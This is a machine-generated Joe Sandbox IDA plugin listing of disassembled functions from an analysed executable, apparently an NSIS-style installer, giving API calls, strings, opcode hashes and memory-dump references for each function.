Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

